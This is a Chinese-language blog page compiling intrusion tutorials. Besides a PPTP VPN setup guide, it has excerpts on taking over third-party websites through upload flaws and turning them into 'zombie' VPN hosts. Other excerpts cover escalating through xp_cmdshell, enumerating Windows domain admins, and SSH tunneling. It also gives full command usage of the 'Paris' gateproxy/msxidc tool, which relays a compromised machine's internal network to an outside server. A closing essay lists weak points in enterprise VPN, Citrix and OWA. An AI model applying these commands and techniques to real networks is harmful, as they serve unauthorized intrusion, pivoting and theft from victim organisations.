Chinadu's Blog

准备:

cat /etc/issue //看版本

如果dns没设置,就编辑/etc/resolv.conf 改DNS

如果主机不能上网就试着防火墙里允许通过

下载程序:

cd /tmp
wget http://poptop.sourceforge.net/yum/stable/packages/dkms-2.0.17.5-1.noarch.rpm
wget http://poptop.sourceforge.net/yum/stable/packages/kernel_ppp_mppe-1.0.2-3dkms.noarch.rpm
根据第一步的返回情况,下载对应版本的rpm

如果是Centos 4版本的
wget http://poptop.sourceforge.net/yum/stable/packages/ppp-2.4.3-7.rhel4.i386.rpm
wget http://poptop.sourceforge.net/yum/stable/packages/pptpd-1.3.4-1.rhel4.i386.rpm

CentOS 5的
wget http://poptop.sourceforge.net/yum/stable/packages/ppp-2.4.4-3.1.rhel5.i386.rpm
wget http://poptop.sourceforge.net/yum/stable/packages/pptpd-1.3.4-1.rhel5.1.i386.rpm

安装程序:

下载回来这4个文件后安装 [按顺序]

rpm -ivh dkms-2.0.17.5-1.noarch.rpm
rpm -ivh kernel_ppp_mppe-1.0.2-3dkms.noarch.rpm

Centos 4:
rpm -Uvh ppp-2.4.3-7.rhel4.i386.rpm
rpm -ivh pptpd-1.3.4-1.rhel4.i386.rpm

CentOS 5:
rpm -Uvh ppp-2.4.4-3.1.rhel5.i386.rpm
rpm -ivh pptpd-1.3.4-1.rhel5.1.i386.rpm

配置pptpd:

echo localip 10.12.12.1 >>/etc/pptpd.conf
echo remoteip 10.12.12.100-254 >>/etc/pptpd.conf

加一个pptpd用户

echo open pptpd open 10.12.12.101 >>/etc/ppp/chap-secrets

临时启用nat (允许访问内网和外网)

echo 1 >/proc/sys/net/ipv4/ip_forward
长期调整的话..可以编辑/etc/sysctl.conf这个文件中的net.ipv4.ip_forward = ???

防火墙设置:

iptables -t nat -F
iptables -t nat -A POSTROUTING -s 10.12.12.0/24 -j SNAT --to 10.12.12.1
service iptables save
防火墙允许通过. 也可以service iptables stop

启动或停止服务:

启动
service pptpd start

停止
service pptpd stop

图文：udb311
主题：MSSQL内网渗透案例分析
发表：黑白前线

描述：对于内网渗透技术一直感觉很神秘，手中正巧有一个webshell是内网服务器。借此机会练习下内网入侵渗透技术！本文敏感信息以屏蔽！密码都以*号代替。此次过程主要运用到xp_cmdshell恢复与执行，再通过自己的灵活思维运用。

环境：2003 SERVER
IIS ：6.0 支持php
数据库：MSSQL和MYSQL
网站类型：ASPX

本文重点讲述内网渗透提权部分，对于WEBSHELL不在描述。对于了解入侵渗透的朋友都知道，拿到webshell后服务器能否提权就要先找提权的漏洞所在。从本站的角度来看，存在MSSQL、MYSQL支持ASPX和PHP可以说权限够大的了。先来看看目录能穷举出来哪些东西。先看程序目录，很平常么。没现有SU和MYSQL之类的信息。

阅读全文...

本文阐述：文章从网站入侵到内网渗透提权，作者给大家带来了一篇精彩的内网渗透文章。读后此文你能清晰的认识到内网入侵的细节技术。

由于平时比较忙，用了很久的VPN肉鸡飞掉了，近来正好有时间于是打开google搜索upfile.asp开始找肉鸡，来了台湾某XX站，http://xxx.xxx.tw/xx/upfile.asp，为了不必要的麻烦，我隐藏了敏感内容。直接到传asp提示错误，那么直接传了gif以后，查看上传路径发现自己重命名了，如果没有重命名的话在IIS6下百分之90以上可以拿shell了，除去目录末有执行脚本权限。最后抓包分析改上传路径，最后得到一个shell，图1。具体方法翻翻以前杂志或google找吧，一找一大堆。

执行命令后，发现权限还比较大，能够执行一些简单命令，像net user、ipconfig /all等等。。

阅读全文...

来源：Chinadu`s Blog

XP搞内网的时候，LCX.exe转发出来到本机的端口，在mstsc里面连127.0.0.1是联不上去的,因为XP是单用户。

阅读全文...

1.收集信息。
1-1．不论什么途径获得的内网机器，确定他在内网后，我们首先就要了解这台机器的所属人员，如果我们的目标是公司，那我们就要了解这个人在公司里的职位，他是个什么身份，有多大的权利，这都关系到他在内网里的权限。因为，作为大公司，一个高权限的人他在内网里所要用到的东西就多，那么相对他的机器，当然权限就会比一般普通员工的高很多，这在我的渗透过程中是常见的。
既然有了他的机器，那么翻翻他的电脑这是必要的，如果你说要怎么翻，你可以尝试熟悉他的电脑甚至比他本人还熟，那你就算了解详细了。一台个人用的电脑，从上面翻出与他自己相关的一些信息，和大量公司信息应该是没有问题的，除非，这是台新电脑。
1-2．了解了一定的人员信息，期间你要记下你所掌握到的账号，密码这些重要数据，以后有一定的用，所以，在你渗之前，不妨建个记事本将重要信息保存起来，写个记事本不会浪费你多少时间。接下来，我们就应该对这个网络进行一定的了解，他是一般的内网，还是域？一般大公司都会用域的，我们只需要查一下就知道，要想对他进行渗透，你就必须了解他的网络拓补，当然，一些太具体的物理上我们是无法了解的，我们只能了解我们所能知道的。不管他是INT，DMZ，LAN，我们必须足够掌握。在这，我们就会用到一定的命令，相信大家应该都很熟悉。
ipconfig /all 查询一下本机的一些情况，IP段 网关 属于不属于域
net view 查询一些存在联系的机器，一般以机器名显示，我们需要对其PING出IP，一是方便查询哪些重要机器的IP，二是方便查询存在几个段
net view /domain 查询有几个域 因为大型网络里面一般不止一个域的
net group /domain 查询域里面的组
net user /domain 查询域用户
net group "domain admins" /domain 查询域管理用户组
这些都是我们需要了解的，当然有时候还会需要再查询一些信息，NET命令下你们都会找到，不需要我再重复，具体的情况具体分析问题。
阅读全文...

作者：lcx

这期的专栏是我设定的题目，看够了注入，是不是想了解一下内网的入侵手法呢？做为出题人，自然要写一篇了。在各式各样大小不同的内网中，最常见的就 是域内 网了。其实域内网的入侵和我们平常的入侵手法在总体上来讲的逻辑也是一样，也是信息的收集、分析，找出薄弱点，然后击破，再综合归纳整理，最终拿到域管理 员的密码，算是大功告成。有了内网的第一台机器的权限后，如何收集信息，这是很关键的一步，这篇文章讲的就是域内网信息的收集的第一步。

图1（点击查看大图）

阅读全文...

文 ring04h[EST]

在渗透测试过程中，经常遇到如下情形，内部网络主机通过路由器或者安全设备做了访问控制，无法通过互联网直接访问本地开放的服务，Windows方 面，国内通常选择Lcx.exe来进行端口转发，在应用方面大多数人也会选择reDuh来进行端口转发，而*nix却很少人用系统自带的ssh、 iptables自身来处理此类问题。
由于时间有限，本文只详细的介绍ssh tunnel方面的知识,iptables的有空在加上。

SSH的三个端口转发命令：
ssh -C -f -N -g -L listen_port:DST_Host:DST_port user@Tunnel_Host
ssh -C -f -N -g -R listen_port:DST_Host:DST_port user@Tunnel_Host
ssh -C -f -N -g -D listen_port user@Tunnel_Host

-f Fork into background after authentication.
后台认证用户/密码，通常和-N连用，不用登录到远程主机。

-p port Connect to this port. Server must be on the same port.
被登录的ssd服务器的sshd服务端口。

阅读全文...

首先，我们会在什么情况下遇见内网？如果你的目标只局限于一个小WEB，那你完全不用考虑内网了。但是，如果你的目标是一个大WEB，或者一个大公司，那你就必须考虑内网的问题。

在我们的渗透过程中，很多大型网络的外部网站或是服务器不一定有用，当然外网也可以作为我们的一个突破口，毕竟没有经过尝试，我们也不知道里面的结构，至少在外部上我们可以获取一定的信息也说不定，但是对于内网，外网绝对不是我们的主要路径。很多时候我们直接从外网入手，想进入内网，已变得越来越困难。

那面对内网，我们应该怎样做呢？有些什么可利用的？或者有些什么方法？下面，我们就来一起讨论下。

渗透，本身就是一个信息收集，然后分类归档，技术利用，从而达到目标。

那我们拿到一个内网的机器时，我们首要要做的事情就是要进入信息的收集，什么信息？很多。。。

1.收集信息。
阅读全文...

Paris/0.2.1 (01/14/2007)
研究成果:
www.rootkit.com.cn
www.horseb.org
软件作者:horseb (黑色技术成员组 www.rootkit.com.cn )

此工具能够让你在内网渗透中事半功倍.让你的计算机属于对方内网的状态。
使用方法:
目前流行的httptunnel其实还属于正向隧道，有WINDOWS OS的防火墙或ipsec端口过滤比较严格的话，没办法使用，而且现在的通道除了VPN比较可靠安全，其他都不可靠。

Paris经过使用比较安全可靠
目前主要有下面的用法：
1．入侵内网时，在能占领的出口或代理主机上运行softrouter，外网softrouter server 可以关联内网主机这样在外网就很方便的控制内网主机。
2. 如果内网有一些有特殊应用服务的主机，但是不能通过公司的路由器配置映射到外网的，这里可以通过这个软件把相应端口映射到外网，这样外网就可以使用内网上某些资源，比如web站点。

使用Paris 建立 VPN方法：
如何建立VPN
1。方案
在202.106.0.202# gateproxy.exe-P2380 STLS=fcl SERVER=socks
在192.168.1.12# gateproxy.exe -P1100 STLS=fsv SERVER=socks SOCKS=202.106.0.202:2380

内网IP 192.168.1.12

肉鸡IP 202.106.0.202

如果肉鸡的端口能正向连接的话可以做的
先在肉鸡上执行在202.106.0.202# gateproxy.exe-P2380 STLS=fcl SERVER=socks
然后再在自己的机器上执行gateproxy.exe -P1100 STLS=fsv SERVER=socks SOCKS=202.106.0.202:2380

这样你的网络192.168.1.12 就可以访问 202.106.0.202 这台机器对应的内网的所有机器的所有端口了

2.方案2
在202.106.0.202# gateproxy.exe-P2380 STLS=fcl SERVER=socks
在202.106.0.202# msxidc.exe -l127.0.0.1 -p2380 -m99 -s218.155.0.1 -r9001
在192.168.1.12# gateproxy.exe -P1100 STLS=fsv SERVER=socks SOCKS=218.155.0.1:99

这里说明一下，这里的msxidc.exe程序是Rootkit.com.cn 的软件路由程序
这里是为了解决肉鸡IP 202.106.0.202封正向端口的情况的，如果肉鸡IP 202.106.0.202：2380端口
连不上的话，就要用msxidc.exe把202.106.0.202：2380转到218.155.0.1:99的端口上，我们连接
218.155.0.1:99就等于连接上了肉鸡IP 202.106.0.202：2380了，这样就通过218.155.0.1:99端口
中转建立了和肉鸡202.106.0.202：2380的SSL VPN了
这里的218.155.0.1:9001 是softrouter的另外一个转发的侦听服务的端口

注意：这里必须要按照以上命令序列执行，否则不能连接上

附软件路由器的其他使用语法：
$$$$$$$$$$ software router version 0.01 $$$$$$$$$$$$$$

$$$$$$$$$$ copyright@2005 horse_b $$$$$$$$$$$$$$$$$$

msxidc -lVIM_IP -pVIMHOST_PORT -mMAP_MSvIDCs_PORT -sMSvIDCs_IP -rMSvIDCs_PORT

example:msxidc -l10.0.0.1 -p1433 -m99 -s218.155.0.1 -r9001

内网要连到外面的主机 10.0.0.1 这台内网主机要提供给外网的服务端口 1433 在外网上映射成的端口99 外网softrouterserver 的IP218.155.0.1 外网softrouterserver 的PORT 9001

这样我们就能在外网访问 218.155.0.1：99 就随时访问内网的 10.0.0.1：1433

msxidc -MMAP_MSvIDCs_PORT -SMSvIDCs_IP -RMSvIDCs_PORT

example:msxidc -M99 -S218.155.0.1 -R9001

msxidc -PLOCALHOST_PORT -XMAP_MSvIDCs_PORT -YMSvIDCs_IP -ZMSvIDCs_PORT

example:msxidc -P1433 -X99 -Y218.155.0.1 -Z9001
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 

文章来源 安全焦点论坛

一些企业级网络，尤其是欧美的大公司，其网络结构的一般特点是dmz区和内网基本隔绝，域划分清晰，权限设置细致严格，防火墙和IDS配置完备。要想进行攻击和渗透，其思路与入侵一些只使用虚拟主机服务或者只有一台独立web服务器的小公司站点自然完全不同。但大公司也有大公司的问题，比如一个总部设在美国的公司，其要整合该公司在美国各州以至全球各地的分公司的局域网来联合工作或者架构成统一管理的公司级内网，必然也要 使用一些特殊的网络应用和解决方案，而这些应用和方案往往是安全防范的最薄弱环节，也是黑客们 渗透攻击的常用切入点。在软件方面，目前被利用来渗透的有如下切入点：

1. VPN和WebVPN，很多大企业内网的各个子网之间的相互连接是通过虚拟专用网(vpn)，而为了方便处在外网的员工访问内部网络资源，会向员工提供可以拨号进入虚拟专用网的客户端连接软件，常用的有Cisco Systems VPN Client或Nortel Networks Contivity VPN Client等。对于软件本身，每个客户端连接工具都可能存在漏洞，比如Cisco VPN集线器中存在远程组名称枚举漏洞(BUGTRAQ ID: 13992)，其IPsec VPN客户端又存在组密码信息泄露漏洞(BUGTRAQ ID: 10155)，Nortel的VPN客户端则存在本地权限提升漏洞(BUGTRAQ ID: 14542)，这些漏洞都有可能导致恶意用户获得VPN网络的非授权访问；而对于软件的配置，以Cisco的客户端的为例，其配置是使用一个.pcf配置文件，里面主要的敏感信息有三个，提供VPN服务的IP地址，组密码和个人密码；而另外一种常见的WebVPN服务不需要用户另外下载客户端，可以直接在一个提供WebVPN服务的站点登录，然后再通过该站点访问企业电子信箱或其他内网资源，WebVPN一般会使用企业员工在公司的个人帐户进行认证，但有时更安全的设置会使用双认证(two-factor)形式的登陆，即首先需要一个帐户登录WebVPN，登录后根据其选择要访问的网络资源，比如公司电子信箱或Intranet，再需要另一个注册帐户认证。这种配置的弱点在于只要有一个员工的帐户信息或者VPN配置文件不慎泄露，那么整个公司的内网就会受到威胁；而且如果公司员工在公司外的站点注册使用一些服务，比如一些公众论坛或者免费电子信箱，在注册时会需要填写个人信箱和密码信息， 安全意识不高的员工往往会使用公司的电子邮件地址甚至和登录公司的VPN服务一样的密码进行注册，这样一旦其中一些安全防范较薄弱的站点遭到攻击，其存储的用户信息就会对用户所在的公司网络造成威胁,尤其是对于拥有大量员工的大企业,这种风险的系数反而更高。

2. Citrix，Citrix Systems公司出品的微软远程桌面的连接服务已经成为很多大公司提供远程应用程序服务的第一选择，其需要用户首先安装Citrix的Client，用注册帐户登录Citrix的Metaframe Web Interface，再根据所选择要使用的应用程序，比如Microsoft Office Word，Windows Desktop或其他任意预先设定的应用程序，启动相应.ica文件来进行访问，其特点是拒绝远程直接的3389端口连接终端服务，可以根据不同权限设置访问限制，还可以共享本地硬盘便于文件操作等。这个服务软件的本身不断发现有漏洞，比如Citrix MetaFrame Presentation Server有用户名策略可被绕过的漏洞(http://securitytracker.com/id?1014994)，Citrix MetaFrame密码管理器加密机制也存在漏洞(http://www.foundstone.com/products/sa/fs-sa-04-05-04.pdf)；该软件配置的弱点在于只有Metraframe的Web接口的一次认证，登录后就可以获得远程服务器上的应用程序访问权，而大部分应用程序需要对文件进行操作，黑客往往可以利用文件的选择窗口寻找并打开windows系统目录下的explore.exe，再进而获得桌面的访问权，然后会再尝试利用服务器本地漏洞提升权限。由于很多公司会将Citrix服务器放在内网，因此一旦服务器遭到入侵，公司的内网又会受到巨大威胁。

3. Outlook Web Access(OWA)和Exchange Server, 很多公司的电子邮件服务器使用了Microsoft公司的Exchange Server，为了便于员工远程收发电子邮件，又往往会开启Exchange的Outlook Web Access服务，登录其一般也只需用个人帐户进行一次认证。对于软件本身，不同版本的OWA服务本身就存在一些漏洞，比如OWA for Exchange Server 5.5存在允许跨站点脚本执行攻击的漏洞(MS04-026，MS05-029)，而Exchange Server最近则被发现有危险等级最高的远程溢出漏洞(MS05-021)；在配置方面，由于用户登陆OWA 是使用电子邮件帐户信息，本文介绍的第一个切入点所可能遭受的威胁对于该服务同样适用；另外更严重的是，与处在DMZ区的Web服务器不同，Exchange Server往往会被放置在内网，一旦遭到入侵，黑客可能会直接获得内网的访问权。http://www.foundstone.com/products/sa/fs-sa-04-05-04.pdfhttp://securitytracker.com/id?1014994